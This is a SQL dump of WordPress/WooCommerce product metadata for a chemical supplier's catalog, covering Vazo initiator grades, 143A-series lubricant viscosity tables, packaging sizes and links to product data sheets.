INSERT INTO `wp_postmeta` VALUES (3772, 452, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3773, 452, '_ywtm_content_tab_description', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3774, 452, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3775, 452, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3776, 452, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3777, 452, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3778, 452, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (3779, 570, '_wp_attached_file', '2016/08/VazoT-52-PDS.pdf'); 
INSERT INTO `wp_postmeta` VALUES (3780, 571, '_wp_attached_file', '2016/08/VazoT-64-PDS.pdf'); 
INSERT INTO `wp_postmeta` VALUES (3781, 572, '_wp_attached_file', '2016/08/VazoT-67-PDS.pdf'); 
INSERT INTO `wp_postmeta` VALUES (3782, 573, '_wp_attached_file', '2016/08/VazoT-88-PDS.pdf'); 
INSERT INTO `wp_postmeta` VALUES (3783, 427, '318_custom_list_file', 'a:2:{s:32:"1f089ae2630d6ac2b3805ac28c68d579";a:3:{s:4:"name";s:6:"VAZO64";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoT-64-PDS.pdf";s:4:"desc";s:11:"VAZO 64-TDS";}s:32:"862758023d872a0067517bc7b7d88fec";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoR-General-Information-PUSH-1.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (3784, 568, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3785, 568, '318_custom_list_file', 'a:2:{s:32:"6ba4588f930103e1a62073e16bfae9de";a:3:{s:4:"name";s:7:"VAZO 52";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoT-52-PDS.pdf";s:4:"desc";s:11:"VAZO 52-TDS";}s:32:"862758023d872a0067517bc7b7d88fec";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoR-General-Information-PUSH-1.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (3786, 574, '_wp_attached_file', '2016/08/Vazo-52-1-1-e1471617162546.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3787, 574, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:397;s:6:"height";i:217;s:4:"file";s:38:"2016/08/Vazo-52-1-1-e1471617162546.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Vazo-52-1-1-e1471617162546-340x217.jpg";s:5:"width";i:340;s:6:"height";i:217;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Vazo-52-1-1-e1471617162546-250x217.jpg";s:5:"width";i:250;s:6:"height";i:217;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Vazo-52-1-1-e1471617162546-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Vazo-52-1-1-e1471617162546-225x217.jpg";s:5:"width";i:225;s:6:"height";i:217;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3788, 574, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:398;s:6:"height";i:217;s:4:"file";s:15:"Vazo-52-1-1.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-1-340x217.jpg";s:5:"width";i:340;s:6:"height";i:217;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-1-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-1-300x217.jpg";s:5:"width";i:300;s:6:"height";i:217;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1471617123735";a:3:{s:5:"width";i:397;s:6:"height";i:217;s:4:"file";s:30:"Vazo-52-1-1-e1471614488858.jpg";}s:18:"full-1471617138102";a:3:{s:5:"width";i:397;s:6:"height";i:217;s:4:"file";s:30:"Vazo-52-1-1-e1471617123735.jpg";}s:18:"full-1471617162546";a:3:{s:5:"width";i:397;s:6:"height";i:217;s:4:"file";s:30:"Vazo-52-1-1-e1471617138102.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (3790, 575, '_edit_lock', '1496668122:3'); 
INSERT INTO `wp_postmeta` VALUES (3791, 575, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3796, 452, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:20:"Aerospace Data Sheet";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3797, 575, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3798, 575, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3799, 575, '312_default_editor', 'Miller-Stephenson offers four commercial grades: Vazo 52(G), 64(G), 67(G), and 88(G). The grade number is the Celsius temperature at which the half-life in solution is 10 hours. Vazo 67 has the following physical characteristics:\r\n<ul>\r\n 	<li>Vazo 67: log (t1/2) = 7492 (1/T) - 19.215 (in 1,3,5-trimethylbenzene)</li>\r\n 	<li>Delivered in solid white "noodle" form</li>\r\n 	<li>Soluble in a wide variety of solvents (aromatic hydrocarbons and other functional organic compounds)</li>\r\n 	<li>Slightly soluble in aliphatic hydrocarbons</li>\r\n</ul>\r\nInsoluble in water'); 
INSERT INTO `wp_postmeta` VALUES (3800, 575, '317_default_editor', '100g, 10 and 50 lbs fiber drum, 25kg Corrugated carton'); 
INSERT INTO `wp_postmeta` VALUES (3801, 575, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3802, 575, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3803, 575, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3804, 575, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3805, 575, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3806, 575, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3807, 575, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3808, 575, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3809, 575, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3810, 575, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3811, 575, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3812, 575, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3813, 575, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3814, 575, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3815, 575, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3816, 575, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3817, 575, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3818, 575, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3819, 575, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3820, 575, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3821, 575, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3822, 575, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3823, 575, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3824, 575, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (3825, 575, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3826, 575, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3827, 575, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3828, 575, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3829, 575, '_product_image_gallery', '1352'); 
INSERT INTO `wp_postmeta` VALUES (3830, 575, '318_custom_list_file', 'a:2:{s:32:"208d8ad8ace00176d3f2ad5c8da17cab";a:3:{s:4:"name";s:7:"VAZO 67";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoT-67-PDS.pdf";s:4:"desc";s:7:"VAZO 67";}s:32:"862758023d872a0067517bc7b7d88fec";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoR-General-Information-PUSH-1.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (3831, 577, '_edit_lock', '1496670298:3'); 
INSERT INTO `wp_postmeta` VALUES (3833, 579, '_edit_lock', '1472051657:2'); 
INSERT INTO `wp_postmeta` VALUES (3834, 579, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3836, 579, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3837, 579, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3838, 579, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Property</p>\r\n</td>\r\n<td style="text-align: center;" width="89">143AZ</td>\r\n<td style="text-align: center;" width="89">143AA</td>\r\n<td style="text-align: center;" width="89">143AY</td>\r\n<td style="text-align: center;" width="89">143AB</td>\r\n<td style="text-align: center;" width="89">143AC</td>\r\n<td style="text-align: center;" width="89">143AD</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @0°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">228</td>\r\n<td style="text-align: center;" width="89">350</td>\r\n<td style="text-align: center;" width="89">620</td>\r\n<td style="text-align: center;" width="89">1070</td>\r\n<td style="text-align: center;" width="89">3940</td>\r\n<td width="89">\r\n<p style="text-align: center;">7500</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @40°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">22.8</td>\r\n<td style="text-align: center;" width="89">32</td>\r\n<td style="text-align: center;" width="89">50</td>\r\n<td style="text-align: center;" width="89">78</td>\r\n<td style="text-align: center;" width="89">243</td>\r\n<td width="89">\r\n<p style="text-align: center;">450</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @100°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">4.1</td>\r\n<td style="text-align: center;" width="89">5.3</td>\r\n<td style="text-align: center;" width="89">7.4</td>\r\n<td style="text-align: center;" width="89">10.2</td>\r\n<td style="text-align: center;" width="89">25.4</td>\r\n<td width="89">\r\n<p style="text-align: center;">42.4</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Temperature Range °C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">-57-149</td>\r\n<td style="text-align: center;" width="89">-51-177</td>\r\n<td style="text-align: center;" width="89">-46-204</td>\r\n<td style="text-align: center;" width="89">-40-232</td>\r\n<td style="text-align: center;" width="89">-34-288</td>\r\n<td style="text-align: center;" width="89">-29-316</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3839, 579, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3840, 579, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3841, 579, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3842, 579, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3843, 579, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3844, 579, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3845, 579, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3846, 579, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3847, 579, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3848, 579, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3849, 579, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3850, 579, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3851, 579, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3852, 579, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3853, 579, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3854, 579, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3855, 579, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3856, 579, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3857, 579, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3858, 579, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3859, 579, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3860, 579, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3861, 579, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3862, 579, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3863, 579, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3864, 579, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (3865, 579, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3866, 579, '_ywtm_content_tab_description', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3867, 579, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3868, 579, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3869, 579, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3870, 579, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3871, 579, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (3872, 579, '318_custom_list_file', 'a:1:{s:32:"70ccdffe290807f0793a91fbbfcfd7bc";a:3:{s:4:"name";s:20:"Aerospace Data Sheet";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3896, 579, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3897, 579, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3898, 580, '_edit_lock', '1472051746:2'); 
INSERT INTO `wp_postmeta` VALUES (3899, 580, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3901, 580, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3902, 580, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3903, 580, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Property</p>\r\n</td>\r\n<td style="text-align: center;" width="89">143AZ</td>\r\n<td style="text-align: center;" width="89">143AA</td>\r\n<td style="text-align: center;" width="89">143AY</td>\r\n<td style="text-align: center;" width="89">143AB</td>\r\n<td style="text-align: center;" width="89">143AC</td>\r\n<td style="text-align: center;" width="89">143AD</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @0°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">228</td>\r\n<td style="text-align: center;" width="89">350</td>\r\n<td style="text-align: center;" width="89">620</td>\r\n<td style="text-align: center;" width="89">1070</td>\r\n<td style="text-align: center;" width="89">3940</td>\r\n<td width="89">\r\n<p style="text-align: center;">7500</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @40°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">22.8</td>\r\n<td style="text-align: center;" width="89">32</td>\r\n<td style="text-align: center;" width="89">50</td>\r\n<td style="text-align: center;" width="89">78</td>\r\n<td style="text-align: center;" width="89">243</td>\r\n<td width="89">\r\n<p style="text-align: center;">450</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @100°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">4.1</td>\r\n<td style="text-align: center;" width="89">5.3</td>\r\n<td style="text-align: center;" width="89">7.4</td>\r\n<td style="text-align: center;" width="89">10.2</td>\r\n<td style="text-align: center;" width="89">25.4</td>\r\n<td width="89">\r\n<p style="text-align: center;">42.4</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Temperature Range °C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">-57-149</td>\r\n<td style="text-align: center;" width="89">-51-177</td>\r\n<td style="text-align: center;" width="89">-46-204</td>\r\n<td style="text-align: center;" width="89">-40-232</td>\r\n<td style="text-align: center;" width="89">-34-288</td>\r\n<td style="text-align: center;" width="89">-29-316</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3904, 580, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3905, 580, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3906, 580, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3907, 580, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3908, 580, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3909, 580, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3910, 580, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3911, 580, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3912, 580, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3913, 580, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3914, 580, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3915, 580, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3916, 580, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3917, 580, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3918, 580, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3919, 580, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3920, 580, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3921, 580, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3922, 580, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3923, 580, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3924, 580, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3925, 580, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3926, 580, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3927, 580, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3928, 580, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3929, 580, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (3930, 580, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3931, 580, '_ywtm_content_tab_description', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3932, 580, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3933, 580, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3934, 580, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3935, 580, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3936, 580, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (3937, 580, '318_custom_list_file', 'a:1:{s:32:"70ccdffe290807f0793a91fbbfcfd7bc";a:3:{s:4:"name";s:20:"Aerospace Data Sheet";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3961, 580, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3962, 580, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3963, 581, '_edit_lock', '1472051820:2'); 
INSERT INTO `wp_postmeta` VALUES (3964, 581, '_edit_last', '2'); 
